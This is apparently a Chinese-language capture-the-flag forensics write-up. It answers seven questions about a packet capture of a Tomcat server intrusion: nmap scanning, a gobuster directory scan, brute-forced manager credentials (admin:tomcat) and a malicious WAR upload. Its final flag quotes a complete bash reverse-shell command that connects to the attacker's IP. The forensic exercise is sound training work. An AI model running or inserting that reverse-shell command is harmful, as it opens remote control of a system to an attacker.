下载附件的 pcap 包
# 题目 1
在 web 服务器上发现的可疑活动,流量分析会显示很多请求,这表明存在恶意的扫描行为,通过分析扫描的行为后提交攻击者 IP flag 格式:flag {ip},如:flag {127.0.0.1}
往下一划发现大量的 SYN 请求,应该是 nmap 的请求
看到来源 IP: 14.0.0.120
flag: flag{14.0.0.120}
# 题目 2
找到攻击者 IP 后请通过技术手段确定其所在地址 flag 格式: flag {城市英文小写}
查一下 IP 地址归属地嘛:https://www.ip2location.com/demo/14.0.0.120
flag: flag{guangzhou}
# 题目 3
哪一个端口提供对 web 服务器管理面板的访问? flag 格式:flag {2222}
搜一下控制台看看 tomcat 开在哪个端口上了
flag: flag{8080}
# 题目 4
经过前面对攻击者行为的分析后,攻击者运用的工具是? flag 格式:flag {名称}
开一条后面的 http 来看看
用的 gobuster
flag: flag{gobuster}
# 题目 5
攻击者拿到特定目录的线索后,想要通过暴力破解的方式登录,请通过分析流量找到攻击者登录成功的用户名和密码? flag 格式:flag {root-123}
搜关键字 Authorization
,找到登录成功的记录,解一下 base64 的账号密码
root@iZ8vbcel8dngdb1gs24d0dZ:~# echo "YWRtaW46dG9tY2F0" | base64 -d | |
admin:tomcat |
flag: flag{admin-tomcat}
# 题目 6
攻击者登录成功后,先要建立反弹 shell, 请分析流量提交恶意文件的名称? flag 格式:flag {114514.txt}
倒着往前找流量可以找到,或者通过 tomcat 的上传 war 包攻击方式搜索 .war
的流量特征
flag: flag{JXQOZY.war}
# 题目 7
攻击者想要维持提权成功后的登录,请分析流量后提交关键的信息? flag 提示,某种任务里的信息
题目 6 的下一条流就是反弹 shell 的记录
flag: flag{/bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'}